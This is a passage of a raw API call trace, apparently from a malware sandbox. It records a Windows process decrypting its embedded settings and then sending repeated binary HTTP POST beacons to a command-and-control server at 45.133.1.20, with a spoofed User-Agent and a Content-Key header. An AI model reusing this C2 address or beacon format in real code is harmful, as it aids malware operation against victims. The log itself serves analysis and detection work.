name=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0317.252] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0317.252] GetProcessHeap () returned 0x6a0000 [0317.252] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf0e0 [0317.252] GetProcessHeap () returned 0x6a0000 [0317.252] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dff48 [0317.253] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0317.254] wvsprintfA (in: param_1=0x6dff48, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0317.254] GetProcessHeap () returned 0x6a0000 [0317.254] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6df4a8 [0317.254] GetProcessHeap () returned 0x6a0000 [0317.255] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dff48 | out: hHeap=0x6a0000) returned 1 [0317.255] GetProcessHeap () returned 0x6a0000 [0317.255] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0317.255] GetProcessHeap () returned 0x6a0000 [0317.255] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dff48 [0317.260] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0317.261] wvsprintfA (in: param_1=0x6dff48, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0317.261] GetProcessHeap () returned 0x6a0000 [0317.261] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0317.261] GetProcessHeap () returned 0x6a0000 [0317.261] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dff48 | out: hHeap=0x6a0000) returned 1 [0317.262] send (s=0xc34, buf=0x6bd460*, len=242, flags=0) returned 242 [0317.262] send (s=0xc34, buf=0x6bb998*, len=159, flags=0) returned 159 [0317.262] GetProcessHeap () returned 0x6a0000 [0317.263] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6da320 [0317.263] recv (in: s=0xc34, buf=0x6da320, len=4048, flags=0 | out: buf=0x6da320*) returned 204 [0317.334] GetProcessHeap () returned 0x6a0000 [0317.334] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0317.334] GetProcessHeap () returned 0x6a0000 [0317.335] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0317.335] GetProcessHeap () returned 0x6a0000 [0317.335] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6df4a8 | out: hHeap=0x6a0000) returned 1 [0317.336] GetProcessHeap () returned 0x6a0000 [0317.337] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf0e0 | out: hHeap=0x6a0000) returned 1 [0317.337] closesocket (s=0xc34) returned 0 [0317.337] GetProcessHeap () returned 0x6a0000 [0317.338] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baaa0 | out: hHeap=0x6a0000) returned 1 [0317.338] GetProcessHeap () returned 0x6a0000 [0317.338] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0317.338] GetProcessHeap () returned 0x6a0000 [0317.339] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0317.339] GetProcessHeap () returned 0x6a0000 [0317.339] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0317.340] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6da320, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x199c) returned 0xc34 [0317.343] Sleep (dwMilliseconds=0xea60) [0317.355] GetProcessHeap () returned 0x6a0000 [0317.355] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0317.357] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0317.358] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0317.369] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0317.369] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf058) returned 1 [0317.381] GetProcessHeap () returned 0x6a0000 [0317.381] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0317.382] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0317.382] CryptImportKey (in: hProv=0x6bf058, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0317.383] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0317.384] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0317.385] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0317.385] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0317.385] GetProcessHeap () returned 0x6a0000 [0317.385] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0317.387] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0317.387] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0317.391] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0317.392] CryptDestroyKey (hKey=0x6ad020) returned 1 [0317.393] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0317.393] CryptReleaseContext (hProv=0x6bf058, dwFlags=0x0) returned 1 [0317.393] GetProcessHeap () returned 0x6a0000 [0317.393] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0317.394] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0317.394] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0317.395] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0317.395] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0317.396] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0317.397] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0317.397] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0317.398] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0317.398] GetProcessHeap () returned 0x6a0000 [0317.398] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0317.398] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0317.399] GetProcessHeap () returned 0x6a0000 [0317.399] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0317.399] GetProcessHeap () returned 0x6a0000 [0317.399] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0317.400] GetProcessHeap () returned 0x6a0000 [0317.400] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0317.400] GetProcessHeap () returned 0x6a0000 [0317.400] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0317.401] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0317.401] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0317.408] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0317.408] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0317.420] GetProcessHeap () returned 0x6a0000 [0317.420] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0317.428] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0317.429] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0317.430] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0317.430] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0317.431] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0317.434] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0317.434] GetProcessHeap () returned 0x6a0000 [0317.435] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0317.436] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0317.436] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0317.437] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0317.437] CryptDestroyKey (hKey=0x6ad020) returned 1 [0317.438] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0317.439] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0317.439] GetProcessHeap () returned 0x6a0000 [0317.439] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0317.440] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0317.440] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0317.441] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0317.442] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0317.442] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0317.443] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0317.444] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0317.444] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0317.444] GetProcessHeap () returned 0x6a0000 [0317.444] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0317.444] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0317.444] GetProcessHeap () returned 0x6a0000 [0317.444] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa30 [0317.444] socket (af=2, type=1, protocol=6) returned 0xc38 [0317.445] connect (s=0xc38, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0317.488] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0317.488] GetProcessHeap () returned 0x6a0000 [0317.488] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf168 [0317.488] GetProcessHeap () returned 0x6a0000 [0317.488] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dff48 [0317.489] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0317.490] wvsprintfA (in: param_1=0x6dff48, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0317.490] GetProcessHeap () returned 0x6a0000 [0317.490] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6df9e8 [0317.490] GetProcessHeap () returned 0x6a0000 [0317.490] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dff48 | out: hHeap=0x6a0000) returned 1 [0317.490] GetProcessHeap () returned 0x6a0000 [0317.490] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0317.491] GetProcessHeap () returned 0x6a0000 [0317.491] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dff48 [0317.491] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0317.492] wvsprintfA (in: param_1=0x6dff48, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0317.492] GetProcessHeap () returned 0x6a0000 [0317.492] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0317.492] GetProcessHeap () returned 0x6a0000 [0317.493] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dff48 | out: hHeap=0x6a0000) returned 1 [0317.493] send (s=0xc38, buf=0x6bd460*, len=242, flags=0) returned 242 [0317.494] send (s=0xc38, buf=0x6bb998*, len=159, flags=0) returned 159 [0317.494] GetProcessHeap () returned 0x6a0000 [0317.494] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6da320 [0317.494] recv (in: s=0xc38, buf=0x6da320, len=4048, flags=0 | out: buf=0x6da320*) returned 204 [0317.563] GetProcessHeap () returned 0x6a0000 [0317.563] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0317.564] GetProcessHeap () returned 0x6a0000 [0317.564] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0317.564] GetProcessHeap () returned 0x6a0000 [0317.565] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6df9e8 | out: hHeap=0x6a0000) returned 1 [0317.565] GetProcessHeap () returned 0x6a0000 [0317.565] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf168 | out: hHeap=0x6a0000) returned 1 [0317.565] closesocket (s=0xc38) returned 0 [0317.566] GetProcessHeap () returned 0x6a0000 [0317.566] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa30 | out: hHeap=0x6a0000) returned 1 [0317.566] GetProcessHeap () returned 0x6a0000 [0317.566] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0317.566] GetProcessHeap () returned 0x6a0000 [0317.567] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0317.567] GetProcessHeap () returned 0x6a0000 [0317.567] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0317.570] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6da320, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x19a0) returned 0xc38 [0317.584] Sleep (dwMilliseconds=0xea60) [0317.586] GetProcessHeap () returned 0x6a0000 [0317.586] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0317.587] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0317.587] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0317.598] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0317.598] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6befd0) returned 1 [0317.606] GetProcessHeap () returned 0x6a0000 [0317.606] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0317.606] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0317.608] CryptImportKey (in: hProv=0x6befd0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad060) returned 1 [0317.608] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0317.609] CryptSetKeyParam (hKey=0x6ad060, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0317.610] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0317.610] CryptSetKeyParam (hKey=0x6ad060, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0317.610] GetProcessHeap () returned 0x6a0000 [0317.610] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0317.611] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0317.611] CryptDecrypt (in: hKey=0x6ad060, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0317.612] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0317.613] CryptDestroyKey (hKey=0x6ad060) returned 1 [0317.613] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0317.613] CryptReleaseContext (hProv=0x6befd0, dwFlags=0x0) returned 1 [0317.614] GetProcessHeap () returned 0x6a0000 [0317.614] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0317.614] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0317.615] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0317.615] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0317.616] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0317.616] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0317.617] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0317.617] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0317.618] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0317.618] GetProcessHeap () returned 0x6a0000 [0317.618] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0317.618] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0317.618] GetProcessHeap () returned 0x6a0000 [0317.618] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0317.619] GetProcessHeap () returned 0x6a0000 [0317.619] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0317.619] GetProcessHeap () returned 0x6a0000 [0317.619] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0317.619] GetProcessHeap () returned 0x6a0000 [0317.619] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0317.620] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0317.620] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0317.625] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0317.625] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf058) returned 1 [0317.632] GetProcessHeap () returned 0x6a0000 [0317.632] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0317.633] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0317.633] CryptImportKey (in: hProv=0x6bf058, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0317.634] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0317.634] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0317.635] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0317.635] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0317.635] GetProcessHeap () returned 0x6a0000 [0317.636] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0317.637] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0317.637] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0317.638] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0317.638] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0317.639] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0317.639] CryptReleaseContext (hProv=0x6bf058, dwFlags=0x0) returned 1 [0317.639] GetProcessHeap () returned 0x6a0000 [0317.639] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0317.641] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0317.641] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0317.642] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0317.642] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0317.643] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0317.643] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0317.644] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0317.644] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0317.644] GetProcessHeap () returned 0x6a0000 [0317.644] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0317.644] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0317.644] GetProcessHeap () returned 0x6a0000 [0317.644] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baad0 [0317.644] socket (af=2, type=1, protocol=6) returned 0xc3c [0317.645] connect (s=0xc3c, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0317.670] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0317.670] GetProcessHeap () returned 0x6a0000 [0317.670] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf278 [0317.670] GetProcessHeap () returned 0x6a0000 [0317.670] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dff48 [0317.671] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0317.672] wvsprintfA (in: param_1=0x6dff48, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php 